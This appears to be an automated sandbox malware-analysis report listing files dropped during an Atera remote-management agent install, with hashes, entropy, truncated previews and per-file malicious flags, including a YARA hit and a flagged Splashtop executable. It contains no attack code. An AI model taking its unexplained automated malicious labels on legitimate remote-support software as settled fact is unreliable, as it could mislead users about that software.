                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ce

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSystemTools.exe.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1921
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.369488805277227
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkWHKCHKlT40HKe6gHeHK/:iqbYqGSI6oPtzHeqKkWqCqZ40q1g+q/
                                                                                                                                                                                                                                                                                              MD5:39BA2FA7696119EA870E3FAC4407C38A
                                                                                                                                                                                                                                                                                              SHA1:16B75C6AC116A443F1EB521949F47BA505AF9B4F
                                                                                                                                                                                                                                                                                              SHA-256:DC31B098095BC4FCDD8D7801FD2DD381F3EFFB91BDC828A86628AEABC451D113
                                                                                                                                                                                                                                                                                              SHA-512:2D9A05E99B3E5DB253C1B4849D23A1959253F021A714C04191BD963AD9FA844500CD753E527E98A016ECA7571060CDA4065DD7E84C134563BFCAF25CBB2767DF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ce

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1075
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.353521172341231
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNa8mE4Dp689:MxHKQwYHKGSI6oPtHTHhAHKKka8mHDpN
                                                                                                                                                                                                                                                                                              MD5:BDADAD127D5A6079C29C0C870A5C3C2C
                                                                                                                                                                                                                                                                                              SHA1:AD5D30886AE959F271CF777D386A31CD792C9A64
                                                                                                                                                                                                                                                                                              SHA-256:7186B9EAC66BD83E5E1C050D81529BC68511538118E65019EBECFD952C22FD55
                                                                                                                                                                                                                                                                                              SHA-512:198087F52C39A32ACE7A90E9212C2AA0F31EDF8349773C8C6C5495CA82C890F9A8A44356AC5AEBB42F3342E6BE981DC4BCFE1D7FB43760745D7240A117257725
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv7

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:NlllulqXlZ:NllUq
                                                                                                                                                                                                                                                                                              MD5:E414B74A281C00450CBB2E9CF4B11859
                                                                                                                                                                                                                                                                                              SHA1:BD3716D303E828EAAFB6EE07A7C89D25C680B985
                                                                                                                                                                                                                                                                                              SHA-256:02A78FB5D84C588164968EA535CE17DB800C6219D2CD31E2DE668E5CF3AD047E
                                                                                                                                                                                                                                                                                              SHA-512:57E655BBADEC0B09A1E68F11DFC5D14E44C47F94832AB308D2F055A5F5F136B3699C192628888CBFC4A424DFAFFF8C8CD4DA37E40EBED420E72781627B1AC771
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:@...e................................................@..........

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\AteraSetupLog.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):225824
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7943895654908313
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:ni6/faQ3VtgHCLgFNKnZG218vpATgaiCUC6mqsA0jRb1w1KgIgLQd6tYN8qpp/S6:nmvjq9g7w1jHBMkK9EG6L06D
                                                                                                                                                                                                                                                                                              MD5:EBDF76D5DA312F9E1AD5D2BBCB8DA599
                                                                                                                                                                                                                                                                                              SHA1:96BF4C8E90ED5E9735BBF9ECA42D0779EAF6A3AE
                                                                                                                                                                                                                                                                                              SHA-256:FFCF07B8119A7A36B6CE86F7EAD50147BD5620F43EA93642FF9BEA0234C14B47
                                                                                                                                                                                                                                                                                              SHA-512:A11B5880A3E30173A8F3E0C22596873AB5694D49E331722D83AC2A0195E7EA08DCFD5311C7BEC299590CBAC0E8F03C4F63C5860FDCB835D651FC477BD173CEA2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\AteraSetupLog.txt, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.6./.0.1./.2.0.2.5. . .0.6.:.5.9.:.1.2. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.6.C.:.8.C.). .[.0.6.:.5.9.:.1.2.:.9.8.8.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.6.C.:.8.C.). .[.0.6.:.5.9.:.1.2.:.9.8.8.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.6.C.:.8.C.). .[.0.6.:.5.9.:.1.2.:.9.8.8.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.W.i.n.d.o.w.s.\.T.E.M.P.\.a.t.e.r.a.A.g.e.n.t.S.e.t.u.p.6.4._.1._.8._.7._.2...m.s.i..... . . . . . . . . . . .*.*.*.*.*.*.*. .A.c.t.i.o.n.:. ..... . . . . . . . . . . .*.*.*.*.*.*.*. .C.o.m.m.a.n.d.L.i.n.e.:. .*.*.*.*.*.*.*.*.*.*.....M.S.I. .(.c.). .(.6.C.:.8.C.). .[.0.6.:.5.9.:.

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\PreVer.log.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4332
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.673128795836758
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:Yf+FZg1QVpOp1OiWbfeVtJ0Bd81cJK1cJcf3ieGykeGptJt4eP5MA:qUeSVpOp1OiWCCS37TgH
                                                                                                                                                                                                                                                                                              MD5:13268F6DC3EF0890EEA4E0C9272E182F
                                                                                                                                                                                                                                                                                              SHA1:270D53CBC7C40B0DDF4803F878EB71383A45161F
                                                                                                                                                                                                                                                                                              SHA-256:CCA7EB2BDBCF75B157D897BDFDC6FC7E01116543E8F55C53E54F44BB53FDA09A
                                                                                                                                                                                                                                                                                              SHA-512:F0C8FFC9F2001E06507BAA7A60889E55D015B963B445B2B7B88E5C92E317D79AA26E9CBF595449D3F15F5CEEC767B46096153075084580769A08DC82A687F279
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.6./.0.1./.2.0.2.5. . .0.6.:.5.9.:.2.5. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.2.C.:.7.4.). .[.0.6.:.5.9.:.2.5.:.8.1.1.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.2.C.:.7.4.). .[.0.6.:.5.9.:.2.5.:.8.1.1.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.2.C.:.7.4.). .[.0.6.:.5.9.:.2.5.:.8.1.1.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .s.e.t.u.p...m.s.i..... . . . . . . . . . . .*.*.*.*.*.*.*. .A.c.t.i.o.n.:. ..... . . . . . . . . . . .*.*.*.*.*.*.*. .C.o.m.m.a.n.d.L.i.n.e.:. .*.*.*.*.*.*.*.*.*.*.....M.S.I. .(.c.). .(.2.C.:.7.4.). .[.0.6.:.5.9.:.2.5.:.8.1.1.].:. .C.l.i.e.n.t.-.s.i.d.e. .a.n.d. .U.I. .i.s. .n.o.n.e. .

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\SplashtopStreamer.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):56907920
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.937481143445435
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1572864:xnOdpvYs+cvrrjOAYfDJnEAOns5w5k8BzFl73BuvH:xQNLOAYfzOBO8B3dmH
                                                                                                                                                                                                                                                                                              MD5:9CD6BA3AD27DAC967F073CBCAD88FEF9
                                                                                                                                                                                                                                                                                              SHA1:FFE503C57539FD91A2F09EFE8FA44958AD96B4A2
                                                                                                                                                                                                                                                                                              SHA-256:248E1FC6DF40583AF705BB617F402092F1943F27416F5557AC9CEFE284761019
                                                                                                                                                                                                                                                                                              SHA-512:A9DA38896354174DED6A1D2AE548A5A797F6BF2A6CA6C8519FC2ED704C39E2D36E916FCB70FE3BB98201C5EB91667CD7D752BD07B4FFC1575526FF87FDBCFFCA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........{F~.(F~.(F~.(O.8(U~.(F~.(.|.(O.>(\~.(O.((.~.(O./(.~.(O.!(A~.(O.?(G~.(O.:(G~.(RichF~.(................PE..L.....Gg............................./............@.................................Rwd.............................................. ..(............0d..(..........`................................i..@...................D........................text............................... ..`.rdata..............................@..@.data....^......."..................@....rsrc...(.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_511hcr1t.znn.psm1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_ak0ubhyu.mx0.psm1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_n5frufks.pyq.psm1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_rxy0at4r.wmb.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_rysklofh.q3j.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\__PSScriptPolicyTest_u3pj0nzr.y0g.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\ateraAgentSetup64_1_8_7_2.msi

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2994176
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                                                                              MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                                                                              SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                                                                              SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                                                                              SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Temp\unpack.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4932
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6462220563524093
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:h05Z2iNzNUk9XA2fNVGmTNuNa9XAA8NVDTNQNl9XANKNVgRNXN49XAiHNV1aNtN6:EGmWP+dL0o
                                                                                                                                                                                                                                                                                              MD5:50B9809AC5B7457275BBE01FA26ABB1F
                                                                                                                                                                                                                                                                                              SHA1:EDC5CD5E33DD17EF9B115992CC81DB8887915F61
                                                                                                                                                                                                                                                                                              SHA-256:21EDAD87FC209175F6C9B4065CBE83520D2A1A6A0DFC1CB183DFC5F1750704C2
                                                                                                                                                                                                                                                                                              SHA-512:6AF9CF38A0A57278DF277747B7DDDEDEC0955061C831BE6C539CC905EADDD429EC78C13AFD840F7E353FAA17A822F102887C529B46D37F09128877BB612854E3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
